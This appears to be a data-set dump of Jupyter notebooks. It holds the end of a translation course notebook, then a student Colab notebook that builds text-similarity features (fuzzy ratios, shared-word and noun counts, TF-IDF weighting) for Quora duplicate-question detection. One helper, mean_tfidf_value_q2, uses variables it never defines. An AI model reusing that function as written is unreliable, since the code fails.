"## Imperfect Translation\nYou might notice that some sentences translate better than others. Since the dataset you're using only has a vocabulary of 227 English words of the thousands that you use, you're only going to see good results using these words. Additionally, the translations in this data set were made by Google translate, so the translations themselves aren't particularly good. (We apologize to the French speakers out there!) Thankfully, for this project, you don't need a perfect translation. However, if you want to create a better translation model, you'll need better data.\n\nYou can train on the [WMT10 French-English corpus](http://www.statmt.org/wmt10/training-giga-fren.tar). This dataset has more vocabulary and richer in topics discussed. However, this will take you days to train, so make sure you've a GPU and the neural network is performing well on dataset we provided. Just make sure you play with the WMT10 corpus after you've submitted this project.\n## Submitting This Project\nWhen submitting this project, make sure to run all the cells before saving the notebook. Save the notebook file as \"dlnd_language_translation.ipynb\" and save it as a HTML file under \"File\" -> \"Download as\". Include the \"helper.py\" and \"problem_unittests.py\" files in your submission.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
e705e04912af3621e8976d52ca667f60976a5f6e | 55,710 | ipynb | Jupyter Notebook | Source Codes/Model Explaination.ipynb | luajunan/CS3244-Quora-Semantics-Project | bb3dfa0ee8938469e4fdd298205a0cafa15efa32 | [
"MIT"
] | 2 | 2021-12-15T06:47:50.000Z | 2021-12-15T06:48:22.000Z | Source Codes/Model Explaination.ipynb | luajunan/CS3244-Quora-Semantics-Project | bb3dfa0ee8938469e4fdd298205a0cafa15efa32 | [
"MIT"
] | null | null | null | Source Codes/Model Explaination.ipynb | luajunan/CS3244-Quora-Semantics-Project | bb3dfa0ee8938469e4fdd298205a0cafa15efa32 | [
"MIT"
] | 3 | 2021-12-03T11:02:48.000Z | 2021-12-15T06:48:40.000Z | 55,710 | 55,710 | 0.610088 | [
[
[
"# Colab for Feature Engineering. #\n\n---\n\n\n## To Do: ##\n1. Separate the Duplicates and Non-Duplicates\n2. Copy the DataFrames into new variables\n3. Process the data into the feature to be extracted\n4. Plot the Histogram to see to observe the distribution\n\n\n---\n\n\n##Features##\n\n1. Number of unique words which occur in q1 and q2 \n2. Ratio of common words / total words (q1+q2)\n2. Common Word Ratio min ( words common/ min(len(q1), len(q2)))\n2. Common Word Ratio mmax ( words common/ max(len(q1), len(q2)))\n2. Common Stop Words min ( common stopwords/ min(len(q1), len(q2)))\n2. Common Stop Words max ( common stopwords/ max(len(q1), len(q2)))\n2. Common Tokens min ( common Tokens / min(len(q1), len(q2)))\n2. Common Tokens max ( common Tokens / max(len(q1), len(q2)))\n2. Common Adjectives min ( common adjectives /min(len(q1), len(q2)))\n2. Common Adjectives max ( common adjectives /max(len(q1), len(q2)))\n2. Common Noun min ( common nouns / min(len(q1), len(q2)))\n2. Common Noun max ( common nouns / max(len(q1), len(q2)))\n2. Fuzz ratio\n2. Fuzz partial ratio \n2. Fuzz Token Sort Ratio \n2. Fuzz Token Set Ratio\n2. Mean Length of 2 questions\n2. Ratio of Length of Questions ( len(q1) / len(q2) )\n2. Absolute Length Difference (| len(q1) - len(q2) |\n2. Longest Matching Substring min ( longest substring/min(len(q1), len(q2)))\n2. Longest Matching Substring max ( longest substring/max(len(q1), len(q2)))\n\n",
"_____no_output_____"
],
[
"Download your required libraries here",
"_____no_output_____"
]
],
[
[
"!pip install bs4\n!pip install fuzzywuzzy\n!pip install TextBlob\n!pip install pickle5\n!python -m spacy download en_core_web_lg\n!pip install keras==2.6.0",
"Requirement already satisfied: bs4 in /usr/local/lib/python3.7/dist-packages (0.0.1)\nRequirement already satisfied: beautifulsoup4 in /usr/local/lib/python3.7/dist-packages (from bs4) (4.6.3)\nCollecting fuzzywuzzy\n Downloading fuzzywuzzy-0.18.0-py2.py3-none-any.whl (18 kB)\nInstalling collected packages: fuzzywuzzy\nSuccessfully installed fuzzywuzzy-0.18.0\nRequirement already satisfied: TextBlob in /usr/local/lib/python3.7/dist-packages (0.15.3)\nRequirement already satisfied: nltk>=3.1 in /usr/local/lib/python3.7/dist-packages (from TextBlob) (3.2.5)\nRequirement already satisfied: six in /usr/local/lib/python3.7/dist-packages (from nltk>=3.1->TextBlob) (1.15.0)\nCollecting pickle5\n Downloading pickle5-0.0.12-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl (256 kB)\n\u001b[K |████████████████████████████████| 256 kB 12.6 MB/s \n\u001b[?25hInstalling collected packages: pickle5\nSuccessfully installed pickle5-0.0.12\nCollecting en_core_web_lg==2.2.5\n Downloading https://github.com/explosion/spacy-models/releases/download/en_core_web_lg-2.2.5/en_core_web_lg-2.2.5.tar.gz (827.9 MB)\n\u001b[K |████████████████████████████████| 827.9 MB 1.2 MB/s \n\u001b[?25hRequirement already satisfied: spacy>=2.2.2 in /usr/local/lib/python3.7/dist-packages (from en_core_web_lg==2.2.5) (2.2.4)\nRequirement already satisfied: cymem<2.1.0,>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (2.0.6)\nRequirement already satisfied: wasabi<1.1.0,>=0.4.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (0.8.2)\nRequirement already satisfied: tqdm<5.0.0,>=4.38.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (4.62.3)\nRequirement already satisfied: catalogue<1.1.0,>=0.0.7 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (1.0.0)\nRequirement already satisfied: blis<0.5.0,>=0.4.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (0.4.1)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (57.4.0)\nRequirement already satisfied: murmurhash<1.1.0,>=0.28.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (1.0.6)\nRequirement already satisfied: thinc==7.4.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (7.4.0)\nRequirement already satisfied: requests<3.0.0,>=2.13.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (2.23.0)\nRequirement already satisfied: numpy>=1.15.0 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (1.19.5)\nRequirement already satisfied: srsly<1.1.0,>=1.0.2 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (1.0.5)\nRequirement already satisfied: preshed<3.1.0,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (3.0.6)\nRequirement already satisfied: plac<1.2.0,>=0.9.6 in /usr/local/lib/python3.7/dist-packages (from spacy>=2.2.2->en_core_web_lg==2.2.5) (1.1.3)\nRequirement already satisfied: importlib-metadata>=0.20 in /usr/local/lib/python3.7/dist-packages (from catalogue<1.1.0,>=0.0.7->spacy>=2.2.2->en_core_web_lg==2.2.5) (4.8.2)\nRequirement already satisfied: zipp>=0.5 in /usr/local/lib/python3.7/dist-packages (from importlib-metadata>=0.20->catalogue<1.1.0,>=0.0.7->spacy>=2.2.2->en_core_web_lg==2.2.5) 
(3.6.0)\nRequirement already satisfied: typing-extensions>=3.6.4 in /usr/local/lib/python3.7/dist-packages (from importlib-metadata>=0.20->catalogue<1.1.0,>=0.0.7->spacy>=2.2.2->en_core_web_lg==2.2.5) (3.10.0.2)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0,>=2.13.0->spacy>=2.2.2->en_core_web_lg==2.2.5) (1.24.3)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0,>=2.13.0->spacy>=2.2.2->en_core_web_lg==2.2.5) (2021.10.8)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0,>=2.13.0->spacy>=2.2.2->en_core_web_lg==2.2.5) (3.0.4)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0,>=2.13.0->spacy>=2.2.2->en_core_web_lg==2.2.5) (2.10)\nBuilding wheels for collected packages: en-core-web-lg\n Building wheel for en-core-web-lg (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for en-core-web-lg: filename=en_core_web_lg-2.2.5-py3-none-any.whl size=829180942 sha256=9d50f1c826803fde486e554edc26b13f7b47017066850fc05b27e8336cc8f61c\n Stored in directory: /tmp/pip-ephem-wheel-cache-adgdwep5/wheels/11/95/ba/2c36cc368c0bd339b44a791c2c1881a1fb714b78c29a4cb8f5\nSuccessfully built en-core-web-lg\nInstalling collected packages: en-core-web-lg\nSuccessfully installed en-core-web-lg-2.2.5\n\u001b[38;5;2m✔ Download and installation successful\u001b[0m\nYou can now load the model via spacy.load('en_core_web_lg')\nCollecting keras==2.6.0\n Downloading keras-2.6.0-py2.py3-none-any.whl (1.3 MB)\n\u001b[K |████████████████████████████████| 1.3 MB 11.9 MB/s \n\u001b[?25hInstalling collected packages: keras\n Attempting uninstall: keras\n Found existing installation: keras 2.7.0\n Uninstalling keras-2.7.0:\n Successfully uninstalled keras-2.7.0\n\u001b[31mERROR: pip's dependency resolver does not currently take into account all the packages that are installed. This behaviour is the source of the following dependency conflicts.\ntensorflow 2.7.0 requires keras<2.8,>=2.7.0rc0, but you have keras 2.6.0 which is incompatible.\u001b[0m\nSuccessfully installed keras-2.6.0\n"
]
],
[
[
"Import your required libraries here",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\nimport re\nfrom bs4 import BeautifulSoup\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom keras.preprocessing.text import Tokenizer\nimport nltk\nfrom fuzzywuzzy import fuzz\nfrom difflib import SequenceMatcher #For finding longest substring\nfrom textblob import TextBlob\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport spacy\nimport en_core_web_lg\nimport pickle5\nfrom keras.models import load_model\nfrom keras import backend as K\nfrom keras.preprocessing.sequence import pad_sequences\nnlp = spacy.load('en_core_web_lg')\nnltk.download('punkt')\nnltk.download('stopwords')\nnltk.download('averaged_perceptron_tagger') # for pos tagging\nfrom tqdm import tqdm_notebook\nfrom scipy.spatial.distance import cosine\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import precision_score, confusion_matrix",
"/usr/local/lib/python3.7/dist-packages/fuzzywuzzy/fuzz.py:11: UserWarning: Using slow pure-python SequenceMatcher. Install python-Levenshtein to remove this warning\n warnings.warn('Using slow pure-python SequenceMatcher. Install python-Levenshtein to remove this warning')\n"
]
],
[
[
"Mounting the dataset onto this google colab",
"_____no_output_____"
]
],
[
[
"from google.colab import drive\ndrive.mount('/content/drive')\n%cd \"/content/drive/MyDrive/CS3244 45 Project/RNN Models\"",
"Mounted at /content/drive\n/content/drive/.shortcut-targets-by-id/1ixE_YVbTLblbUJgpPcDWfO-zlQeoNGq4/CS3244 45 Project/RNN Models\n"
],
[
"#Loading the tokenizer\nwith open('../tokenizer.pickle', 'rb') as saved_tokenizer:\n tokenizer = pickle5.load(saved_tokenizer)\n\ndef exponent_neg_manhattan_distance(left, right):\n return K.exp(-K.sum(K.abs(left-right), axis=1, keepdims=True))\n\nmodel = load_model('ys.h5')",
"WARNING:tensorflow:Layer lstm will not use cuDNN kernels since it doesn't meet the criteria. It will use a generic GPU kernel as fallback when running on GPU.\n"
],
[
"model_initial = load_model('baseline_3')",
"_____no_output_____"
]
],
[
[
"##**Preprocess the questions**",
"_____no_output_____"
]
],
[
[
"# This function accepts a question and preprocesses it. Returns cleaned question.\n# This section of code was referenced from Sourab Vadlamani in his work \"Quora Question Pairs Similairty, Tackling a real life NLP problem\"\n# https://towardsdatascience.com/quora-question-pairs-similarity-tackling-a-real-life-nlp-problem-ab55c5da2e84\n\ndef preprocess(q):\n # Firstly, we convert to lowercase and remove trailing and leading spaces\n q = str(q).lower().strip()\n\n # Replace certain special characters with their string equivalents\n q = q.replace('%', ' percent')\n q = q.replace('$', ' dollar ')\n q = q.replace('₹', ' rupee ')\n q = q.replace('€', ' euro ')\n q = q.replace('@', ' at ')\n\n # The pattern '[math]' appears around 900 times in the whole dataset.\n q = q.replace('[math]', '')\n\n # Replacing some numbers with string equivalents (not perfect, can be done better to account for more cases)\n q = q.replace(',000,000,000 ', 'b ')\n q = q.replace(',000,000 ', 'm ')\n q = q.replace(',000 ', 'k ')\n q = re.sub(r'([0-9]+)000000000', r'\\1b', q)\n q = re.sub(r'([0-9]+)000000', r'\\1m', q)\n q = re.sub(r'([0-9]+)000', r'\\1k', q)\n\n # Decontracting words\n # https://en.wikipedia.org/wiki/Wikipedia%3aList_of_English_contractions\n # https://stackoverflow.com/a/19794953\n contractions = { \n \"ain't\": \"am not\",\n \"aren't\": \"are not\",\n \"can't\": \"can not\",\n \"can't've\": \"can not have\",\n \"'cause\": \"because\",\n \"could've\": \"could have\",\n \"couldn't\": \"could not\",\n \"couldn't've\": \"could not have\",\n \"didn't\": \"did not\",\n \"doesn't\": \"does not\",\n \"don't\": \"do not\",\n \"hadn't\": \"had not\",\n \"hadn't've\": \"had not have\",\n \"hasn't\": \"has not\",\n \"haven't\": \"have not\",\n \"he'd\": \"he would\",\n \"he'd've\": \"he would have\",\n \"he'll\": \"he will\",\n \"he'll've\": \"he will have\",\n \"he's\": \"he is\",\n \"how'd\": \"how did\",\n \"how'd'y\": \"how do you\",\n \"how'll\": \"how will\",\n \"how's\": \"how is\",\n \"i'd\": \"i would\",\n \"i'd've\": \"i would have\",\n \"i'll\": \"i will\",\n \"i'll've\": \"i will have\",\n \"i'm\": \"i am\",\n \"i've\": \"i have\",\n \"isn't\": \"is not\",\n \"it'd\": \"it would\",\n \"it'd've\": \"it would have\",\n \"it'll\": \"it will\",\n \"it'll've\": \"it will have\",\n \"it's\": \"it is\",\n \"let's\": \"let us\",\n \"ma'am\": \"madam\",\n \"mayn't\": \"may not\",\n \"might've\": \"might have\",\n \"mightn't\": \"might not\",\n \"mightn't've\": \"might not have\",\n \"must've\": \"must have\",\n \"mustn't\": \"must not\",\n \"mustn't've\": \"must not have\",\n \"needn't\": \"need not\",\n \"needn't've\": \"need not have\",\n \"o'clock\": \"of the clock\",\n \"oughtn't\": \"ought not\",\n \"oughtn't've\": \"ought not have\",\n \"shan't\": \"shall not\",\n \"sha'n't\": \"shall not\",\n \"shan't've\": \"shall not have\",\n \"she'd\": \"she would\",\n \"she'd've\": \"she would have\",\n \"she'll\": \"she will\",\n \"she'll've\": \"she will have\",\n \"she's\": \"she is\",\n \"should've\": \"should have\",\n \"shouldn't\": \"should not\",\n \"shouldn't've\": \"should not have\",\n \"so've\": \"so have\",\n \"so's\": \"so as\",\n \"that'd\": \"that would\",\n \"that'd've\": \"that would have\",\n \"that's\": \"that is\",\n \"there'd\": \"there would\",\n \"there'd've\": \"there would have\",\n \"there's\": \"there is\",\n \"they'd\": \"they would\",\n \"they'd've\": \"they would have\",\n \"they'll\": \"they will\",\n \"they'll've\": \"they will have\",\n \"they're\": \"they are\",\n \"they've\": 
\"they have\",\n \"to've\": \"to have\",\n \"wasn't\": \"was not\",\n \"we'd\": \"we would\",\n \"we'd've\": \"we would have\",\n \"we'll\": \"we will\",\n \"we'll've\": \"we will have\",\n \"we're\": \"we are\",\n \"we've\": \"we have\",\n \"weren't\": \"were not\",\n \"what'll\": \"what will\",\n \"what'll've\": \"what will have\",\n \"what're\": \"what are\",\n \"what's\": \"what is\",\n \"what've\": \"what have\",\n \"when's\": \"when is\",\n \"when've\": \"when have\",\n \"where'd\": \"where did\",\n \"where's\": \"where is\",\n \"where've\": \"where have\",\n \"who'll\": \"who will\",\n \"who'll've\": \"who will have\",\n \"who's\": \"who is\",\n \"who've\": \"who have\",\n \"why's\": \"why is\",\n \"why've\": \"why have\",\n \"will've\": \"will have\",\n \"won't\": \"will not\",\n \"won't've\": \"will not have\",\n \"would've\": \"would have\",\n \"wouldn't\": \"would not\",\n \"wouldn't've\": \"would not have\",\n \"y'all\": \"you all\",\n \"y'all'd\": \"you all would\",\n \"y'all'd've\": \"you all would have\",\n \"y'all're\": \"you all are\",\n \"y'all've\": \"you all have\",\n \"you'd\": \"you would\",\n \"you'd've\": \"you would have\",\n \"you'll\": \"you will\",\n \"you'll've\": \"you will have\",\n \"you're\": \"you are\",\n \"you've\": \"you have\"\n }\n\n q_decontracted = []\n\n for word in q.split():\n if word in contractions:\n word = contractions[word]\n \n q_decontracted.append(word)\n\n q = ' '.join(q_decontracted)\n q = q.replace(\"'ve\", \" have\")\n q = q.replace(\"n't\", \" not\")\n q = q.replace(\"'re\", \" are\")\n q = q.replace(\"'ll\", \" will\")\n\n # Removing HTML tags\n q = BeautifulSoup(q)\n q = q.get_text()\n\n # Remove punctuations\n pattern = re.compile('\\W')\n q = re.sub(pattern, ' ', q).strip()\n\n return q",
"_____no_output_____"
]
],
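[
[
"*Quick illustration (added):* the cleaner lowercases, expands contractions, spells out symbols such as `%` and `$`, and strips punctuation. The sample sentence is arbitrary.",
"_____no_output_____"
],
[
"# Hedged example of the cleaning pipeline on a made-up question,\n# e.g. it expands \"can't\" to 'can not', '$' to 'dollar', '%' to 'percent'.\nprint(preprocess(\"Can't I earn $100, 50% faster?\"))",
"_____no_output_____"
]
],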
[
[
"##**Jun An**\n\n1. Ratio of Common Words (Common words / total words) (Done)\n2. Ratio of Common Tokens (Common tokens/ max(q1, q2)) (Done)\n3. Fuzz partial ratio (Done)\n4. Longest Matching Substring Min (Done)",
"_____no_output_____"
]
],
[
[
"def num_common_words_ratio(row):\n set1 = set(row['question1'].lower().split())\n set2 = set(row['question2'].lower().split())\n total = len(set1) + len(set2)\n return len(set1.intersection(set2))/total",
"_____no_output_____"
],
[
"def common_tokens_ratio_max(row):\n q1 = set(word_tokenize(row['question1'].lower()))\n q2 = set(word_tokenize(row['question2'].lower()))\n stop_words = set(stopwords.words('english'))\n token1 = [word for word in q1 if word not in stop_words]\n token2 = [word for word in q2 if word not in stop_words]\n ratio = len(set(token1).intersection(set(token2))) / max(len(row['question1']), len(row['question2']))\n\n return ratio\n",
"_____no_output_____"
],
[
"def fuzz_partial_ratio(row):\n q1 = row['question1']\n q2 = row['question2']\n fuzz_partial = fuzz.partial_ratio(q1,q2)\n return fuzz_partial",
"_____no_output_____"
],
[
"def min_longest_substring(row):\n q1 = row['question1']\n q2 = row['question2']\n match = SequenceMatcher(None, q1, q2).find_longest_match(0, len(q1), 0, len(q2))\n return match.size/min(len(q1), len(q2))",
"_____no_output_____"
]
],
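[
[
"*Illustrative example (added):* applying a couple of the features above to a toy question pair, just to make the value ranges concrete. The pair itself is made up.",
"_____no_output_____"
],
[
"# Hedged demo of the features on a single made-up row.\ndemo_pair = pd.DataFrame({'question1': ['how do i learn python'],\n                          'question2': ['how can i learn python fast']})\nprint('common words ratio:', demo_pair.apply(num_common_words_ratio, axis=1)[0])\nprint('fuzz partial ratio:', demo_pair.apply(fuzz_partial_ratio, axis=1)[0])\nprint('min longest substring:', demo_pair.apply(min_longest_substring, axis=1)[0])",
"_____no_output_____"
]
],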
[
[
"##**Penn Han**\n\n1. Number of unique words that occur in q1 and q2\n2. Ratio of Common Tokens to min(len(q1), len(q2))\n3. Fuzz Ratio\n4. Absolute Length Difference between q1 and q2\n5. Mean TF-IDF value\n6. Mean IDF-weighted vector",
"_____no_output_____"
]
],
[
[
"def unique_words_count(row):\n set1 = set(row['question1'].lower().split())\n set2 = set(row['question2'].lower().split())\n return len(set1.intersection(set2))",
"_____no_output_____"
],
[
"def common_token_ratio_min(row):\n q1 = set(word_tokenize(row['question1'].lower()))\n q2 = set(word_tokenize(row['question2'].lower()))\n stop_words = set(stopwords.words('english'))\n token1 = [word for word in q1 if word not in stop_words]\n token2 = [word for word in q2 if word not in stop_words]\n ratio = len(set(token1).intersection(set(token2))) / min(len(row['question1']), len(row['question2']))\n return ratio",
"_____no_output_____"
],
[
"def fuzz_ratio(row):\n q1 = row['question1']\n q2 = row['question2']\n fuzz_ratio = fuzz.ratio(q1,q2)\n return fuzz_ratio",
"_____no_output_____"
],
[
"def abs_len_difference(row):\n q1 = row['question1']\n q2 = row['question2']\n abs_len_diff = abs(len(q1) - len(q2))\n return abs_len_diff",
"_____no_output_____"
],
[
"#Stop words not removed PLEASE ONLY USE EITHER THIS OR THE BELOW, NOT BOTH\n\n#tf_idf_vectoriser = TfidfVectorizer(lowercase=True)\n#q1_train_list = list(train_set['question1'])\n#q2_train_list = list(train_set['question2'])\n#question_corpus = list(q1_train_list + q2_train_list)\n#tf_idf_vectoriser.fit(question_corpus)\n#idf = dict(zip(tf_idf_vectoriser.get_feature_names(), tf_idf_vectoriser.idf_)) #For Weighted W2V\n#nlp = en_core_web_lg.load()",
"_____no_output_____"
],
[
"def mean_tfidf_value_q1(row):\n q1 = word_tokenize(row['question1'].lower())\n stop_words = set(stopwords.words('english'))\n token1 = [word for word in q1 if word not in stop_words]\n if len(token1) > 0:\n q1_vector_matrix = tf_idf_vectoriser.transform(token1) #Transform must take in a iterable so [str]\n return q1_vector_matrix #Returns a sparse matrix\n else:\n return 0",
"_____no_output_____"
],
[
"def mean_tfidf_value_q2(row):\n q2 = set(word_tokenize(row['question2'].lower()))\n stop_words = set(stopwords.words('english'))\n token2 = [word for word in q1 if word not in stop_words]\n if len(token1) > 0:\n q2_vector_matrix = tf_idf_vectoriser.transform(token2) #Transform must take in a iterable so [str]\n return q2_vector_matrix #Returns a sparse matrix\n else:\n return 0",
"_____no_output_____"
],
[
"def calculate_weighted_vector(question):\n weighted_vectors = []\n doc = nlp(question)\n mean_vec = np.zeros((len(doc[0].vector)))\n for word in doc:\n vector = word.vector\n if str(word) in idf:\n idf_weight = idf[str(word)]\n else:\n idf_weight = 0\n mean_vec += vector * idf_weight\n mean_vec /= len(doc)\n return mean_vec",
"_____no_output_____"
],
[
"def mean_idfweighted_vector_q1(row):\n idfweighted_vector_q1 = calculate_weighted_vector(row['question1'])\n return idfweighted_vector_q1",
"_____no_output_____"
],
[
"def mean_idfweighted_vector_q2(row):\n idfweighted_vector_q2 = calculate_weighted_vector(row['question2'])\n return idfweighted_vector_q2",
"_____no_output_____"
],
[
"#train_set[\"tfidf_matrix_q1\"] = train_set.apply(mean_tfidf_value_q1, axis=1)\n#train_set[\"tfidf_matrix_q2\"] = train_set.apply(mean_tfidf_value_q2, axis=1)\n#train_set[\"mean_idfweighted_vector_q1\"] = train_set.apply(mean_idfweighted_vector_q1, axis=1)\n#train_set[\"mean_idfweighted_vector_q2\"] = train_set.apply(mean_idfweighted_vector_q2, axis=1)",
"_____no_output_____"
]
],
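[
[
"*Hedged sketch (added):* the commented-out cells above rely on a fitted `tf_idf_vectoriser` and its `idf` dictionary, so `calculate_weighted_vector` cannot run as-is. The toy example below reproduces the idea — scale each word vector by its idf weight, then average — with hand-built stand-ins for `idf` and the word vectors.",
"_____no_output_____"
],
[
"# Stand-ins: 'idf_demo' plays the role of the fitted vectoriser's idf dict,\n# 'vecs_demo' the role of spaCy word vectors (real ones are 300-d).\nidf_demo = {'learn': 2.0, 'python': 3.0}\nvecs_demo = {'learn': np.ones(3), 'python': 2 * np.ones(3)}\nwords = ['learn', 'python']\nmean_vec = np.zeros(3)\nfor w in words:\n    mean_vec += vecs_demo[w] * idf_demo.get(w, 0)  # vector * idf weight\nmean_vec /= len(words)\nprint(mean_vec)  # [4. 4. 4.]",
"_____no_output_____"
]
],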
[
[
"## Jeremy\n1. common stop words min\n2. common noun min\n3. mean length of 2 questions",
"_____no_output_____"
]
],
[
[
"stop_words = set(stopwords.words('english'))",
"_____no_output_____"
],
[
"def get_min_len_qn(row):\n return min(len(row['question1'].split()), len(row['question2'].split()))",
"_____no_output_____"
],
[
"def calc_common_stop_words_min(row):\n q1 = word_tokenize(row['question1'])\n q2 = word_tokenize(row['question2'])\n stop_words_q1 = set([x for x in q1 if x in stop_words])\n stop_words_q2 = set([x for x in q2 if x in stop_words])\n num_intersect = len(stop_words_q1.intersection(stop_words_q2))\n return num_intersect / get_min_len_qn(row)",
"_____no_output_____"
],
[
"def calc_common_nouns_min(row):\n q1_tokens = word_tokenize(row[\"question1\"].lower())\n q2_tokens = word_tokenize(row[\"question2\"].lower())\n pos_tagged_q1 = nltk.pos_tag(q1_tokens)\n pos_tagged_q2 = nltk.pos_tag(q2_tokens)\n # x[0] is the word, x[1] is the tag\n q1_nouns = set([x[0] for x in pos_tagged_q1 if x[1] == \"NN\"]) \n q2_nouns = set([x[0] for x in pos_tagged_q2 if x[1] == \"NN\"])\n return len(q1_nouns.intersection(q2_nouns)) / get_min_len_qn(row)",
"_____no_output_____"
],
[
"def mean_len_qns(row):\n return (len(word_tokenize(row[\"question1\"].lower())) + len(word_tokenize(row[\"question2\"].lower()))) / 2",
"_____no_output_____"
]
],
[
[
"##Kay Chi\n1. Common stop words max\n2. Common noun max\n3. Ratio of length of questions",
"_____no_output_____"
]
],
[
[
"def get_max_len_qn(row):\n return max(len(row['question1'].split()), len(row['question2'].split()))",
"_____no_output_____"
],
[
"def calc_common_stop_words_max(row):\n q1 = word_tokenize(row['question1'])\n q2 = word_tokenize(row['question2'])\n stop_words_q1 = set([x for x in q1 if x in stop_words])\n stop_words_q2 = set([x for x in q2 if x in stop_words])\n num_intersect = len(stop_words_q1.intersection(stop_words_q2))\n return num_intersect / get_max_len_qn(row)",
"_____no_output_____"
],
[
"def calc_common_nouns_max(row):\n q1_tokens = word_tokenize(row[\"question1\"].lower())\n q2_tokens = word_tokenize(row[\"question2\"].lower())\n pos_tagged_q1 = nltk.pos_tag(q1_tokens)\n pos_tagged_q2 = nltk.pos_tag(q2_tokens)\n # x[0] is the word, x[1] is the tag\n q1_nouns = set([x[0] for x in pos_tagged_q1 if x[1] == \"NN\"]) \n q2_nouns = set([x[0] for x in pos_tagged_q2 if x[1] == \"NN\"])\n return len(q1_nouns.intersection(q2_nouns)) / get_max_len_qn(row)",
"_____no_output_____"
],
[
"def ratio_len_qn(row):\n q1 = row['question1']\n q2 = row['question2']\n return len(q1) / len(q2)",
"_____no_output_____"
]
],
[
[
"## YS\n1. Common Word Ratio max ( words common/ max(len(q1), len(q2))) \n2. Common Adjectives max ( common adjectives /max(len(q1), len(q2)))\n3. Fuzz Token Set Ratio ",
"_____no_output_____"
]
],
[
[
"def common_word_ratio_max(row):\n q1 = row['question1']\n q2 = row['question2']\n return len(set(q1).intersection(set(q2))) / max(len(q1), len(q2))",
"_____no_output_____"
],
[
"# This has been tested to be correct, but result seems off.\ndef get_adjectives(text):\n blob = TextBlob(text)\n return set(word for (word,tag) in blob.tags if tag.startswith(\"JJ\"))\n \ndef common_adjectives_max(row):\n q1 = row['question1']\n q2 = row['question2']\n return len(get_adjectives(q1).intersection(get_adjectives(q2))) / max(len(q1), len(q2))",
"_____no_output_____"
],
[
"def calc_fuzz_token_set_ratio(row):\n q1 = row['question1']\n q2 = row['question2']\n return fuzz.token_set_ratio(q1, q2)",
"_____no_output_____"
]
],
[
[
"##**Neaton**",
"_____no_output_____"
]
],
[
[
"def common_words_ratio_min(row):\n set1 = set(row['question1'].lower().split())\n set2 = set(row['question2'].lower().split())\n common_words = len(set1.intersection(set2))\n return common_words/min(len(set1), len(set2))\n",
"_____no_output_____"
],
[
"# This has been tested to be correct, but result seems off.\ndef get_adjectives(text):\n blob = TextBlob(text)\n return set(word for (word,tag) in blob.tags if tag.startswith(\"JJ\"))\n \ndef common_adjectives_min(row):\n q1 = row['question1']\n q2 = row['question2']\n return len(get_adjectives(q1).intersection(get_adjectives(q2))) / min(len(q1), len(q2))",
"_____no_output_____"
],
[
"def fuzz_token_sort_ratio(row):\n q1 = row['question1']\n q2 = row['question2']\n fuzz_token = fuzz.token_sort_ratio(q1,q2)\n return fuzz_token",
"_____no_output_____"
],
[
"def max_longest_substring(row):\n q1 = row['question1']\n q2 = row['question2']\n match = SequenceMatcher(None, q1, q2).find_longest_match(0, len(q1), 0, len(q2))\n return match.size/max(len(q1), len(q2))",
"_____no_output_____"
]
],
[
[
"##Loading GloVe Embedding",
"_____no_output_____"
]
],
[
[
"%cd '../'",
"/content/drive/.shortcut-targets-by-id/1ixE_YVbTLblbUJgpPcDWfO-zlQeoNGq4/CS3244 45 Project\n"
],
[
